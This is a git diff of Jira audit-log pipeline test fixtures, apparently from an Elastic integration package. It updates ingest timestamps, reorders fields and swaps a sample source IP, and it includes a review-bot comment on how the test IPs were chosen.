name\",\"i18nKey\":\"common.words.fullname\",\"to\":\"Alex\"},{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -6350,7 +6344,7 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-08T14:50:33.590511380Z", + "ingested": "2021-12-15T09:00:40.254709965Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.596Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.system\",\"category\":\"system\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"action\":\"New license added\"},\"affectedObjects\":[{\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Date Purchased\",\"i18nKey\":\"admin.license.date.purchased\",\"to\":\"21/Nov/21\"},{\"key\":\"License Type\",\"i18nKey\":\"admin.license.type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"key\":\"Organization\",\"i18nKey\":\"admin.license.organisation\",\"to\":\"myself\"},{\"key\":\"Server ID\",\"i18nKey\":\"admin.server.id\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"key\":\"Support Entitlement Number (SEN)\",\"i18nKey\":\"admin.license.sen\",\"to\":\"SEN-L17782970\"},{\"key\":\"User Limit\",\"i18nKey\":\"admin.license.user.limit\",\"to\":\"Unlimited\"},{\"key\":\"jira-software\",\"i18nKey\":\"jira-software\",\"to\":\"-1\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -6443,7 +6437,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590513947Z", + "ingested": "2021-12-15T09:00:40.254711161Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.584Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6517,7 +6511,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590516502Z", + "ingested": "2021-12-15T09:00:40.254712359Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.583Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6591,7 +6585,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590519051Z", + "ingested": "2021-12-15T09:00:40.254713579Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.581Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6665,7 +6659,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590521617Z", + "ingested": "2021-12-15T09:00:40.254714847Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.579Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6715,13 +6709,6 @@ } }, { - "source": { - "address": "10.50.33.72", - "ip": "10.50.33.72" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { "version": "1.12.0" @@ -6740,9 +6727,13 @@ "service": { "address": "http://jira.internal:8088" }, + "source": { + "address": "10.50.33.72", + "ip": "10.50.33.72" + }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-08T14:50:33.590524326Z", + "ingested": "2021-12-15T09:00:40.254716027Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.514Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6757,6 +6748,9 @@ "name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "jira": { "audit": { "method": "Browser", 
@@ -6805,7 +6799,7 @@ }, "event": { "action": "jira.auditing.user.renamed", - "ingested": "2021-12-08T14:50:33.590575389Z", + "ingested": "2021-12-15T09:00:40.254717204Z", "original": "{\"timestamp\":\"2021-11-28T18:18:26.076Z\",\"author\":{\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"from\":\"admin.user\",\"to\":\"admin.user1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -6876,7 +6870,7 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-08T14:50:33.590580391Z", + "ingested": "2021-12-15T09:00:40.254718429Z", "original": "{\"timestamp\":\"2021-11-28T18:23:20.278Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"from\":\"admin@example.com\",\"to\":\"admin1@example.com\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -6955,7 +6949,7 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-08T14:50:33.590583039Z", + "ingested": "2021-12-15T09:00:40.254719604Z", "original": "{\"timestamp\":\"2021-11-28T18:23:13.741Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"from\":\"Admin User\",\"to\":\"Admin User1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user",
diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log
index 1949ee04212..8f34ad7d186 100644
--- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log
+++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log
@@ -75,12 +75,12 @@ {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Manage Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":239000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Start/Complete Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":241000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme 
updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Edit Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":243000000},"version":"1.0"} -{"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"0","name":"Default Permission Scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme removed from project","actionI18nKey":"jira.auditing.permission.scheme.removed.from.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"55.6.73.144","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":249000000},"version":"1.0"} +{"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"0","name":"Default Permission Scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme removed from 
project","actionI18nKey":"jira.auditing.permission.scheme.removed.from.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"175.16.199.1","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":249000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme added to project","actionI18nKey":"jira.auditing.permission.scheme.added.to.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":266000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"JIRAUSER10000","name":"test.user","type":"USER"}],"auditType":{"action":"Project created","actionI18nKey":"jira.auditing.project.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"test"},{"i18nKey":"common.words.key","key":"Key","to":"TEST"},{"i18nKey":"common.concepts.description","key":"Description","to":""},{"i18nKey":"common.concepts.projectlead","key":"Project Lead","to":"test.user"},{"i18nKey":"admin.projects.default.assignee","key":"Default 
Assignee","to":"Unassigned"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":297000000},"version":"1.0"} {"affectedObjects":[{"id":"10100","name":"Developers","type":"PROJECT_ROLE"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project roles changed","actionI18nKey":"jira.auditing.project.roles.changed","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"admin.common.words.users","key":"Users","to":"JIRAUSER10000"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":506000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 1.0"},{"i18nKey":"version.releasedate","key":"Release date","to":"2021-11-14"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":521000000},"version":"1.0"} -{"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version 
released","actionI18nKey":"jira.auditing.version.released","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"55.6.73.144","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":535000000},"version":"1.0"} +{"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version released","actionI18nKey":"jira.auditing.version.released","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"175.16.199.1","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":535000000},"version":"1.0"} {"affectedObjects":[{"id":"10001","name":"Version 2.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 2.0"},{"i18nKey":"version.releasedate","key":"Release date","to":"2021-11-28"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":543000000},"version":"1.0"} {"affectedObjects":[{"id":"10002","name":"Version 
3.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 3.0"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":545000000},"version":"1.0"} {"affectedObjects":[],"auditType":{"action":"Audit Log search performed","actionI18nKey":"atlassian.audit.event.action.audit.search","area":"AUDIT_LOG","category":"Auditing","categoryI18nKey":"atlassian.audit.event.category.audit","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[{"name":"Results returned","nameI18nKey":"atlassian.audit.event.attribute.results","value":"85"},{"name":"Query","nameI18nKey":"atlassian.audit.event.attribute.query","value":""},{"name":"Timestamp Range","nameI18nKey":"atlassian.audit.event.attribute.timestamp","value":"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z"},{"name":"ID Range","nameI18nKey":"atlassian.audit.event.attribute.id","value":"1 - 85"}],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539922,"nano":856000000},"version":"1.0"} diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index e689e71c833..d806d889541 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json 
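Review bot: The two rewritten events on the new side replace the routable 55.6.73.144 with 175.16.199.1, which is itself a public address rather than an RFC 5737 documentation range (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), and nothing in the hunk records why this particular value was chosen. It is presumably one of the fixed addresses present in the GeoIP test database that elastic-package's sample-data validation accepts, so that any source.geo enrichment in the expected output stays deterministic, but that convention is invisible to the next person who adds a sample line, and a JSON-per-line .log file has no room for a comment. Suggest recording it where test authors will see it, e.g. in the data stream's README or alongside the pipeline test config, along the lines of `Public source IPs in sample data must come from the GeoIP test set (e.g. 175.16.199.1); otherwise use private (10.0.0.0/8) or RFC 5737 ranges.` The other events in the hunk keep 10.50.33.72, which is private and unaffected by this.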
+++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "10.50.33.72", - "ip": "10.50.33.72" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { "version": "1.12.0" @@ -26,9 +19,13 @@ "service": { "address": "http://jira.internal:8088" }, + "source": { + "address": "10.50.33.72", + "ip": "10.50.33.72" + }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-08T14:50:53.782511828Z", + "ingested": "2021-12-15T09:00:47.652585890Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"jira.auditing.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "group", @@ -43,6 +40,9 @@ "name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "jira": { "audit": { "method": "Browser", 
@@ -91,7 +91,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782517772Z", + "ingested": "2021-12-15T09:00:47.652590454Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":579000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -167,7 +167,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782520488Z", + "ingested": "2021-12-15T09:00:47.652593251Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":581000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -243,7 +243,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782522938Z", + "ingested": "2021-12-15T09:00:47.652595997Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":583000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -319,7 +319,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782525339Z", + "ingested": "2021-12-15T09:00:47.652601532Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":584000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -395,7 +395,7 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-08T14:50:53.782527742Z", + "ingested": "2021-12-15T09:00:47.652604496Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\"}],\"auditType\":{\"action\":\"New license added\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"system\",\"categoryI18nKey\":\"jira.auditing.category.system\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"admin.license.organisation\",\"key\":\"Organization\",\"to\":\"myself\"},{\"i18nKey\":\"admin.license.date.purchased\",\"key\":\"Date Purchased\",\"to\":\"21/Nov/21\"},{\"i18nKey\":\"admin.license.type\",\"key\":\"License Type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"i18nKey\":\"admin.server.id\",\"key\":\"Server ID\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"i18nKey\":\"admin.license.sen\",\"key\":\"Support Entitlement Number (SEN)\",\"to\":\"SEN-L17782970\"},{\"i18nKey\":\"admin.license.user.limit\",\"key\":\"User Limit\",\"to\":\"Unlimited\"},{\"i18nKey\":\"jira-software\",\"key\":\"jira-software\",\"to\":\"-1\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":596000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
